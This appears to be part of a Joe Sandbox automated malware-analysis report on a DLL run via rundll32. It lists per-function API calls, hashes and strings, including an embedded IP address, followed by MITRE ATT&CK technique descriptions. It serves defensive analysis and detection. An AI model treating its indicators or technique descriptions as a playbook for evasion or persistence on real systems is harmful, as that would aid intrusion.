Part of subcall function 000000018000B560: SysAllocString.OLEAUT32 ref: 000000018000B5A6

Part of subcall function 000000018003AE08: SysFreeString.OLEAUT32 ref: 000000018003AE51
Part of subcall function 000000018003AE08: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018003AE64
Part of subcall function 000000018003AE08: ??3@YAXPEAX@Z.MSVCRT ref: 000000018003AE77

SysFreeString.OLEAUT32 ref: 0000000180032B0B
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180032B1E
??3@YAXPEAX@Z.MSVCRT ref: 0000000180032B31

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@Free$??2@AllocFileFindNamePath
String ID:
API String ID: 772211780-0
Opcode ID: f9574987d235c529e2b4a5f79013c743acc608ea97a4ad6ac219f98d4fdede78
Instruction ID: 283ffb4ef057f0283fd59c714cbfe65b47d72467c2882de283dc062303e29699
Opcode Fuzzy Hash: f9574987d235c529e2b4a5f79013c743acc608ea97a4ad6ac219f98d4fdede78
Instruction Fuzzy Hash: 1221B832611A4482EB92DF29D84439EB3A0FB89BF4F198725E779476E9DF7CC6448700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003C614 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 000000018003C62A
malloc.MSVCRT(?,?,?,00000001800188EE), ref: 000000018003C663
free.MSVCRT(?,?,?,00000001800188EE), ref: 000000018003C6B1
GetTickCount.KERNEL32 ref: 000000018003C6B7

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CountTick$freemalloc
String ID:
API String ID: 112427268-0
Opcode ID: 40d9beaaacbcde50260c436ec66f3643f495edb07ad5aab697476aac6434d7f6
Instruction ID: b8918b2958dc72fb2df8bfc42f6eb5cd02d312beeb31fdbe44136919b98f9138
Opcode Fuzzy Hash: 40d9beaaacbcde50260c436ec66f3643f495edb07ad5aab697476aac6434d7f6
Instruction Fuzzy Hash: 3021517261560987EFD78B24EC85BAF23A0B74C7C0F42E024F95682695DF38D75D8B02

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001AF10 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 000000018001AF4B
EnterCriticalSection.KERNEL32 ref: 000000018001AF6C
LeaveCriticalSection.KERNEL32 ref: 000000018001AFB5

Part of subcall function 0000000180065438: InitializeCriticalSection.KERNEL32 ref: 000000018006552A

DeleteCriticalSection.KERNEL32 ref: 000000018001AFE6

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Initialize$DeleteEnterLeave
String ID:
API String ID: 3345835275-0
Opcode ID: 342e2fd84596a913fc4e554fed418576577eb4ed1e3f0298ebe73fa484c4289a
Instruction ID: bac7ba2d50b8a8327d60b40396a6a413962eafb144c30abffe047fc5a4d1e144
Opcode Fuzzy Hash: 342e2fd84596a913fc4e554fed418576577eb4ed1e3f0298ebe73fa484c4289a
Instruction Fuzzy Hash: 51212970605A4896FBD29F50EC543D873A8F74EBE4F588229EAA9062A5DF39C74DC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180070910 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 000000018007093E
_msize.MSVCRT ref: 0000000180070965
realloc.MSVCRT ref: 000000018007097B
memset.MSVCRT ref: 0000000180070999

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: _errno_msizememsetrealloc
String ID:
API String ID: 1716158884-0
Opcode ID: cdc86eb51b19dd29fbdd1dbcc9e2dd10d7135d8ad8bd6beb6c08774733d5e7b7
Instruction ID: eee6de8c671426a850027d5845b58404d35e5bb09185fe1037511193ebe898ed
Opcode Fuzzy Hash: cdc86eb51b19dd29fbdd1dbcc9e2dd10d7135d8ad8bd6beb6c08774733d5e7b7
Instruction Fuzzy Hash: 7201A536715648C1F9869B27A4043D99251AB8CBE0F1DD720BF6A07BCBDE3DC6418700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180064710 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180064746
FreeLibrary.KERNEL32 ref: 000000018006477F
LeaveCriticalSection.KERNEL32 ref: 0000000180064793
DeleteCriticalSection.KERNEL32 ref: 000000018006479D

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$DeleteEnterFreeLeaveLibrary
String ID:
API String ID: 2347899730-0
Opcode ID: 8ca6170e5c17e41b4a506002b7f4800d109eeedd4070b7d9029d326942e7e76d
Instruction ID: 48e8189d87aa0b979fc36c7d6fe6748a55851d8ea4777fada0444d8c8a940578
Opcode Fuzzy Hash: 8ca6170e5c17e41b4a506002b7f4800d109eeedd4070b7d9029d326942e7e76d
Instruction Fuzzy Hash: 6E117033605B4897EB558F21E9443A97360FB4A7B5F1897249B690BAA0CF78D2798300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006A900 Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,?,000000018006A78C,00000000,00000008,00000000,000000018006AA37), ref: 000000018006A91E
_swprintf_c_l.LIBCMT ref: 000000018006A93A
ReadFile.KERNEL32 ref: 000000018006A955
_swprintf_c_l.LIBCMT ref: 000000018006A974

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: File_swprintf_c_l$PointerRead
String ID:
API String ID: 1259558433-0
Opcode ID: 430f8c9727729296bcb3ae13e9e40dcee6c79fd9ad2c75f57ecad12c2e0545ef
Instruction ID: 41788915f12d7117270c0c242483de8f49aba279d1603b6e07884f1d05f749b7
Opcode Fuzzy Hash: 430f8c9727729296bcb3ae13e9e40dcee6c79fd9ad2c75f57ecad12c2e0545ef
Instruction Fuzzy Hash: 9B01F53172864881F7929B61AC407DBA3A1F74D7C4F65C022FA5543A64CF3DC748CB20

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001A3F0 Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

??_U@YAPEAX_K@Z.MSVCRT(?,?,?,00000001800017BF), ref: 000000018001A413
memmove.MSVCRT(?,?,?,00000001800017BF), ref: 000000018001A426
??_U@YAPEAX_K@Z.MSVCRT(?,?,?,00000001800017BF), ref: 000000018001A43F
memmove.MSVCRT(?,?,?,00000001800017BF), ref: 000000018001A452

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: memmove
String ID:
API String ID: 2162964266-0
Opcode ID: f48e30d42f7362a3489efc8b4fb4b1d86e67ce5bf115bf63e3aa4bcefc4ad982
Instruction ID: 461c31f9552aa3729a5e6565f135de1ccc8cc925f396947b96927f6322aea50e
Opcode Fuzzy Hash: f48e30d42f7362a3489efc8b4fb4b1d86e67ce5bf115bf63e3aa4bcefc4ad982
Instruction Fuzzy Hash: A6014B72604B8486DA999F02B84439AA6A4F799FC0F58C034AF9A1BB1ACE7CC2518700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180042CB8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 192COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180042715), ref: 0000000180042D94

Part of subcall function 000000018001AD68: InitializeCriticalSection.KERNEL32(?,?,?,?,?,000000018001AFD5), ref: 000000018001ADCE

Strings

Cache-Control: no-cache, xrefs: 0000000180042E08
Connection: Keep-Alive, xrefs: 0000000180042DE3

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharCriticalInitializeMultiSectionWide
String ID: Cache-Control: no-cache$Connection: Keep-Alive
API String ID: 2071930665-2797312137
Opcode ID: 390d372ab0f8ca9c8d35a5c5b59fa4f1daf8a60d35f223fc70caf0e07e2a75eb
Instruction ID: 06b1c2be51b69464b9694ee66dce0eee22d8a6c444c0793ba53430c965e4d999
Opcode Fuzzy Hash: 390d372ab0f8ca9c8d35a5c5b59fa4f1daf8a60d35f223fc70caf0e07e2a75eb
Instruction Fuzzy Hash: 6971B172300E9886EB96DF26D4807DD3760FB89BD8F86C625BE2947B85CF31D6598304

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003A138 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 000000018003A3B9

Strings

map/set<T> too long, xrefs: 000000018003A3B2

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: map/set<T> too long
API String ID: 909987262-1285458680
Opcode ID: 4f8b5c4a4b7dfd174ba02e61296e3cf7ea921cc7912cdcef76d88542124505ce
Instruction ID: b716ba77de4695a230c5cde56cb36caf30baef682964767987e615475274616d
Opcode Fuzzy Hash: 4f8b5c4a4b7dfd174ba02e61296e3cf7ea921cc7912cdcef76d88542124505ce
Instruction Fuzzy Hash: 17419E32208F8881EAA2CF25E84039E73A4F399BE0F558225EF9D43B95DF39C556C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001C31C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

PathFindFileNameW.SHLWAPI ref: 000000018001C340
wcscmp.MSVCRT ref: 000000018001C398

Strings

RUNDLL32, xrefs: 000000018001C38E

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: FileFindNamePathwcscmp
String ID: RUNDLL32
API String ID: 3222201028-252960710
Opcode ID: cb23065da29cb40e9b09dc38cb932cba9fa4c45224ed154b04bc2c1aad3b4612
Instruction ID: 4f5a5794d41fc096d520f70cd288b3f3e4e93d0d03317b7f7fc332b0f1d573f2
Opcode Fuzzy Hash: cb23065da29cb40e9b09dc38cb932cba9fa4c45224ed154b04bc2c1aad3b4612
Instruction Fuzzy Hash: 87412932711A5896EB919F39C84479C2360FB49BB8F548312EA3D47BE9DF34CA99C344

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004AF08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32 ref: 000000018004AF73

Part of subcall function 00000001800495A4: GetTickCount.KERNEL32 ref: 00000001800495AC
Part of subcall function 00000001800495A4: srand.MSVCRT ref: 00000001800495B4
Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495BA
Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495CE
Part of subcall function 00000001800495A4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
Part of subcall function 00000001800495A4: GetTokenInformation.ADVAPI32 ref: 0000000180049629
Part of subcall function 00000001800495A4: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
Part of subcall function 00000001800495A4: GetLastError.KERNEL32 ref: 000000018004963F
Part of subcall function 00000001800495A4: GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
Part of subcall function 00000001800495A4: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B

Part of subcall function 00000001800494C4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA

memset.MSVCRT ref: 000000018004AF8E

Strings

p, xrefs: 000000018004AF7D

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AuthorityCountCurrentProcess$ErrorExecuteInformationLastShellTickTokenmemsetsrand
String ID: p
API String ID: 526592482-2181537457
Opcode ID: db20606bd2f8c5ddcc62ab015699e8350b9eea6392e973e239eb88e586f6bc5b
Instruction ID: c7a46caf8343ac9de693e6305f929c410170157657da93c1511d6525c5ccc842
Opcode Fuzzy Hash: db20606bd2f8c5ddcc62ab015699e8350b9eea6392e973e239eb88e586f6bc5b
Instruction Fuzzy Hash: B221B632208F8885E7A1DF51F48078AB3A4F799BC4F158021BE8D43B59DF38C549CB44

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005AFB8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

SHGetValueW.SHLWAPI ref: 000000018005B020

Strings

opentime_afterinstall, xrefs: 000000018005B00D
MsgCenter, xrefs: 000000018005AFE8

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: Value
String ID: MsgCenter$opentime_afterinstall
API String ID: 3702945584-3718352646
Opcode ID: bc51746a4845ef3513b79512763e58b7b7c59a9adac5c6c1a917732545d0aad2
Instruction ID: 9121a4dbc030fef007b745f88a0fe18748c482634fd5ebee216f5006264a8ac8
Opcode Fuzzy Hash: bc51746a4845ef3513b79512763e58b7b7c59a9adac5c6c1a917732545d0aad2
Instruction Fuzzy Hash: AC116A72600B4482EB508F29E44438AB760F789BF4F108316EB79437E4CF79C688CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180074CC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40sleepthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000000180074CD8
Sleep.KERNEL32(?,171.8.167.45,?,0000000180074FBF,?,?,?,?,?,?,000000018006F6BE), ref: 0000000180074CF4

Strings

171.8.167.45, xrefs: 0000000180074CCB

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CurrentSleepThread
String ID: 171.8.167.45
API String ID: 1164918020-2723241389
Opcode ID: b82daa9be066ead2ec14612a1a02b00537e7c47846788e1f0fd2d6a2c4d35c95
Instruction ID: 739a1f1183ec9c18e579ba8ee55cb859ca32a6d953d7c9429809cc63265ca520
Opcode Fuzzy Hash: b82daa9be066ead2ec14612a1a02b00537e7c47846788e1f0fd2d6a2c4d35c95
Instruction Fuzzy Hash: B201D13370425586E7A3DFA9B88039E66A0F74C7E0F058431FF4487655EF79C99A8B80

Uniqueness

Uniqueness Score: -1.00%

Function 000000018008455E Relevance: 5.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 000000018008457B
_CxxThrowException.MSVCRT ref: 000000018008459B
_CxxThrowException.MSVCRT ref: 00000001800845BE
_CxxThrowException.MSVCRT ref: 00000001800845E1

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ExceptionThrow
String ID:
API String ID: 432778473-0
Opcode ID: 114c5287cdb026fffe76d3c7f9949e070cfa45e7e663d84f565ee682834d51f6
Instruction ID: 38ed7ffc1fc9f375285380fd3d7b3dc2d70f7ac5fc31fc0dcffbf51ad022335a
Opcode Fuzzy Hash: 114c5287cdb026fffe76d3c7f9949e070cfa45e7e663d84f565ee682834d51f6
Instruction Fuzzy Hash: 9D0184B1650A88C9E79DFF33A8063FB6212BBD87C0F18C835B9954B65BDE25C21A4700

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
